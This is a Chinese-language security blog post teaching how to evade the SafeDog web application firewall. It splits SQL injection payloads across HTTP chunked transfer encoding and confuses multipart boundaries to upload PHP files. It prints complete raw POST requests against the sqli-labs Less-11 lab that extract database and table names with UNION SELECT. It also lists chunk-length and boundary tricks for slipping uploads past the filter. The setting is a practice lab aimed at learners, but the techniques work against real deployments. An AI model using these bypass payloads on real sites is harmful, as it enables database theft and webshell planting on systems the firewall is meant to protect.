waf绕过--打狗棒法

ivi

用户773616194 猪猪谈安全 2023-05-02 19:00 发表于江苏

0x01 前言

某狗可谓是比较好绕过的waf，但是随着现在的发展，某狗也是越来越难绕过了，但是也不是毫无办法，争取这篇文章给正在学习waf绕过的小白来入门一种另类的waf绕过。

环境的搭建：

环境的搭建就选择phpstudy2018+安全狗最新版(2022年10月23日前)

1. Tip：
   
2.   （1）记得先在phpstudy的Apache的bin目录下初始化Apache服务，一般来说，第一次为询问是否确认，第二次为确认安装（命令：httpd.exe -k install -n apache2.4  用管理员打开）
   
3.   （2）上传防护中把完整的post包过滤勾选上。

复制代码

0x02 HTTP补充：

分块传输的介绍：

分块传输编码是超文本传输协议（HTTP）中的一种数据传输机制，允许HTTP由应用服务器向客户端发送的数据分成多个部分，在消息头中指定 Transfer-Encoding: chunked 就表示整个response将使分块传输编译来传输内容。一个消息块由n块组成，并在最后一个大小为0的块结束。

请求头Transfer-encoding：

官方文档:

告知接收方为了可靠地传输报文，已经对其进行了何种编码。

chunked编码，使用若干个chunk串连接而成，由一个标明长度为0的chunk表示解释，每个chunk分为头部和正文两部分，头部内容定义了下一行传输内容的个数（个数用16进制来进行表示）和数量（一般不写数量，但是为了混淆，这里还是把数量写上去）正文部分就是指定长度的实际内容。两部分之间用(CRLF)来隔开，在最后一个长度为0的chunk中表示结束。并且长度中是以;作为长度的结束

数据包中添加：Transfer-Encoding: chunked

数字代表下一行的字符所占位数，最后需要用0独占一行表示结束，结尾需要两个回车

当设置这个Transfer-Encoding请求头的时候，会有两个效果：

Content-length字段自动忽略

基于长久化持续推送动态内容（不太了解，但是第三感觉有研究内容）

HTTP持久化连接：

因为现在大多数是http1.1协议版本，所以的话，只在Transfer-Encoding中定义了chunked一种编码格式。

持久化连接：

  Http请求是运行在TCP连接上的，所以自然有TCP的三次握手和四次挥手，慢启动的问题，所以为了提高http的性能，就使用了持久化连接。持久化连接在《计算机网络》中有提及。

  在Http1.1的版本中规定了所有连接默认都是持久化连接，除非在请求头上加上Connection：close。来关闭持久化连接。

Content-Type介绍：

Content-Type：互联网媒体类型， 也叫MIME类型，在HTTP的协议消息头中，使用Content-Type来表示请求和响应中的媒体数据格式标签，用于区分数据类型。

常见Content-Type的格式如下：

1. Content-Type: text/html;
   
2. Content-Type: application/json;charset:utf-8;
   
3. Content-Type：type/subtype ;parameter
   
4. Content-Type：application/x-www-form-urlencoded
   
5. Content-Type：multipart/form-data

复制代码

重点介绍multipart/form-data：

当服务器使用multipart/form-data接收POST请求的时候，服务器如何知道开始位置和结束位置的呢？？？

其中就是用了boundary边界来进行操作的。

waf绕过的思路：

正常传输的payload都是可以被waf的正则匹配到的，而进行分块传输之后的payload，waf的正则不会进行匹配，而又满足http的规则，所以就能绕过waf。

例如：

正常传输过程中是这样的。

那么分块传输之后，就变成了这样。

1. POST /sqli-labs-master/Less-11/ HTTP/1.1
   
2. Host: 192.168.172.161
   
3. Content-Length: 128
   
4. Cache-Control: max-age=0
   
5. Upgrade-Insecure-Requests: 1
   
6. Origin: http://192.168.172.161
   
7. Content-Type: application/x-www-form-urlencoded
   
8. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
   
9. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
   
10. Referer: http://192.168.172.161/sqli-labs-master/Less-11/
    
11. Accept-Encoding: gzip, deflate
    
12. Accept-Language: zh-CN,zh;q=0.9
    
13. Connection: close
    
14. Transfer-Encoding: chunked
    
15. 
    
16. 4
    
17. unam
    
18. 1
    
19. e
    
20. 1
    
21. =
    
22. 4
    
23. admi
    
24. 1
    
25. n
    
26. 1
    
27. &
    
28. 4
    
29. pass
    
30. 2
    
31. wd
    
32. 1
    
33. =
    
34. 4
    
35. admi
    
36. 1
    
37. n
    
38. 1
    
39. &
    
40. 4
    
41. subm
    
42. 2
    
43. it
    
44. 1
    
45. =
    
46. 4
    
47. Subm
    
48. 2
    
49. it
    
50. 0
    

复制代码

说明是可以识别分块传输的东西，那么我们就可以构造payload来看是否可以绕过waf。

绕过安全狗的sql注入：

这里先解决一下绕过安全狗的方式，在常见的方式中，我们都采用垃圾字符填充的方式来绕过安全狗，虽然效果很好，但是较为复杂，也容易出现被狗咬伤的情况，所以为了解决这一现状，小秦同学翻阅之后发现了分块传输的方式来绕过安全狗。但是分块传输目前来看只能适用于post请求。get请求还是比较难说。

以sql-labs为例：

在sqli-labs的第十一关，我们发现了可以用post请求。先正常看看过滤哪些字符，这里开门见山，直接把'union select (database()),2#。这个东西进行了过滤

咱们可以尝试使用分块传输的方式来进行绕过。这里在请求头中添加。

1. Transfer-Encoding: chunked
   
2. 这个东西，然后进行分块即可。

复制代码

读取数据库名

1. POST /sqli-labs-master/Less-11/ HTTP/1.1
   
2. Host: 192.168.172.161
   
3. Content-Length: 251
   
4. Cache-Control: max-age=0
   
5. Upgrade-Insecure-Requests: 1
   
6. Origin: http://192.168.172.161
   
7. Content-Type: application/x-www-form-urlencoded
   
8. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
   
9. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
   
10. Referer: http://192.168.172.161/sqli-labs-master/Less-11/
    
11. Accept-Encoding: gzip, deflate
    
12. Accept-Language: zh-CN,zh;q=0.9
    
13. Connection: close
    
14. Transfer-Encoding: chunked
    
15. 
    
16. 1
    
17. u
    
18. 4
    
19. name
    
20. 1
    
21. =
    
22. 1
    
23. &
    
24. 2
    
25. pa
    
26. 4
    
27. sswd
    
28. 1
    
29. =
    
30. 3
    
31. %27
    
32. 2
    
33. un
    
34. 1
    
35. i
    
36. 2
    
37. on
    
38. 1
    
39. +
    
40. 2
    
41. se
    
42. 1
    
43. l
    
44. 2
    
45. ec
    
46. 1
    
47. t
    
48. 1
    
49. +
    
50. 3
    
51. %28
    
52. 2
    
53. da
    
54. 1
    
55. t
    
56. 2
    
57. ab
    
58. 1
    
59. a
    
60. 2
    
61. se
    
62. 3
    
63. %28
    
64. 3
    
65. %29
    
66. 3
    
67. %29
    
68. 3
    
69. %2C
    
70. 1
    
71. 2
    
72. 3
    
73. %23
    
74. 1
    
75. &
    
76. 3
    
77. sub
    
78. 3
    
79. mit
    
80. 1
    
81. =
    
82. 3
    
83. Sub
    
84. 3
    
85. mit
    
86. 0
    

复制代码

读取表名：

1. POST /sqli-labs-master/Less-11/ HTTP/1.1
   
2. Host: 192.168.172.161
   
3. Content-Length: 619
   
4. Cache-Control: max-age=0
   
5. Upgrade-Insecure-Requests: 1
   
6. Origin: http://192.168.172.161
   
7. Content-Type: application/x-www-form-urlencoded
   
8. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
   
9. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
   
10. Referer: http://192.168.172.161/sqli-labs-master/Less-11/
    
11. Accept-Encoding: gzip, deflate
    
12. Accept-Language: zh-CN,zh;q=0.9
    
13. Connection: close
    
14. Transfer-Encoding: chunked
    
15. 
    
16. 1
    
17. u
    
18. 2
    
19. na
    
20. 1
    
21. m
    
22. 1
    
23. e
    
24. 1
    
25. =
    
26. 1
    
27. &
    
28. 2
    
29. pa
    
30. 2
    
31. ss
    
32. 2
    
33. wd
    
34. 1
    
35. =
    
36. 3
    
37. %27
    
38. 1
    
39. u
    
40. 2
    
41. ni
    
42. 1
    
43. o
    
44. 1
    
45. n
    
46. 1
    
47. +
    
48. 2
    
49. se
    
50. 2
    
51. le
    
52. 1
    
53. c
    
54. 1
    
55. t
    
56. 1
    
57. +
    
58. 3
    
59. %28
    
60. 2
    
61. se
    
62. 1
    
63. l
    
64. 1
    
65. e
    
66. 2
    
67. ct
    
68. 1
    
69. +
    
70. 2
    
71. gr
    
72. 2
    
73. ou
    
74. 1
    
75. p
    
76. 1
    
77. _
    
78. 2
    
79. co
    
80. 2
    
81. nc
    
82. 2
    
83. at
    
84. 3
    
85. %28
    
86. 2
    
87. ta
    
88. 2
    
89. bl
    
90. 1
    
91. e
    
92. 1
    
93. _
    
94. 2
    
95. na
    
96. 2
    
97. me
    
98. 3
    
99. %29
    
100. 1
     
101. +
     
102. 2
     
103. fr
     
104. 2
     
105. om
     
106. 1
     
107. +
     
108. 2
     
109. in
     
110. 2
     
111. fo
     
112. 1
     
113. r
     
114. 3
     
115. mat
     
116. 2
     
117. io
     
118. 1
     
119. n
     
120. 1
     
121. _
     
122. 2
     
123. sc
     
124. 3
     
125. hem
     
126. 1
     
127. a
     
128. 1
     
129. .
     
130. 2
     
131. ta
     
132. 2
     
133. bl
     
134. 2
     
135. es
     
136. 1
     
137. +
     
138. 2
     
139. wh
     
140. 2
     
141. er
     
142. 1
     
143. e
     
144. 1
     
145. +
     
146. 2
     
147. ta
     
148. 2
     
149. bl
     
150. 1
     
151. e
     
152. 1
     
153. _
     
154. 2
     
155. sc
     
156. 2
     
157. he
     
158. 1
     
159. m
     
160. 1
     
161. a
     
162. 3
     
163. %3D
     
164. 2
     
165. da
     
166. 1
     
167. t
     
168. 2
     
169. ab
     
170. 3
     
171. ase
     
172. 3
     
173. %28
     
174. 3
     
175. %29
     
176. 3
     
177. %29
     
178. 3
     
179. %2C
     
180. 1
     
181. 2
     
182. 3
     
183. %23
     
184. 1
     
185. &
     
186. 2
     
187. su
     
188. 3
     
189. bmi
     
190. 1
     
191. t
     
192. 1
     
193. =
     
194. 2
     
195. Su
     
196. 4
     
197. bmit
     
198. 0
     

复制代码

读列名：

读取数据：

绕过安全狗的文件上传（以pikachu靶场为例

这里上面讲到了分块传输，这里直接先使用分块传输来进行绕过。这里讲下计算方式，因为文件上传不像sql注入那样单行，所以文件上传是会有回车和空格的计算，（一个回车和一个空格占两个字符）。例如下图：

红框中的部分，分别处于不同的行，所以需要传入回车，所以这部分就应该是：

这块先去上传php文件为例，可以进行分块传输的构造。然后上传。

发现单单的分块传输已经不能绕过安全狗文件上传的检测了。

Content-Type中的boundary边界混淆绕过

因为上面讲到了Content-Type类型，那么对于我们来说，文件上传一定是利用了Content-Type中的multipart/form-data来进行的文件上传操作，刚才讲到了利用multipart/form-data必须用boundary边界来进行限制，那么我们这里研究一下boundary边界的一些问题。

深入研究boundary边界问题：

这里拿上面的边界来做文章，这里看到了，当上面定义了boundary=----WFJAFAOKAJNFKLAJ的时候我想到了两个问题。

1. 1.如果有两个boundary是取前一个还是后一个？
   
2. 2.boundary结束标志必须和定义的一定相同嘛？
   
3. 
   
4. 下面继续一一测试
   

复制代码

boundary边界问题fuzz：boundary边界一致：

boundary结束标志不一致：

boundary开始标志不一致：

上面经过研究可以发现boundary结束标志不影响判断。

多个boundary：

所以当定义两个boundary的时候，只有第一个起作用。经过了上面的测试发现，我们可以通过构造多个boundary和修改boundary结束标志来达到混淆的效果，这里进行测试。

多个boundary混淆：

这里进入uploads/1.php查看

成功绕过waf。

发现：

这里发现，其他不用非得加boundary混淆，测到boundary后面加分号就直接可以绕过安全狗来上传成功。

对于分块传输的小Tip：

1. (1)分块传输的每个长度以;结尾，所以可以构造1;fjaojafjao这种来干扰waf
   
2. (2)分块传输的时候是不会管Content-Length的长度，所以可以通过Content-Length的长度变换来绕过某些waf
   
3. (3)分块传输只是适用于post请求，这也是存在的弊端问题

复制代码

总结：

绕过waf的方式多种多样，但是越简单的方式越需要底层的探索，所以底层的学习是非常必要的。希望给正在学习绕waf的小伙伴提供一些思路。而不仅限于垃圾字符填充。

参考文献：

1. https://zhuanlan.zhihu.com/p/465948117
   
2. http://t.zoukankan.com/liujizhou-p-11802189.html
   
3. https://copyfuture.com/blogs-details/202203261638435585

复制代码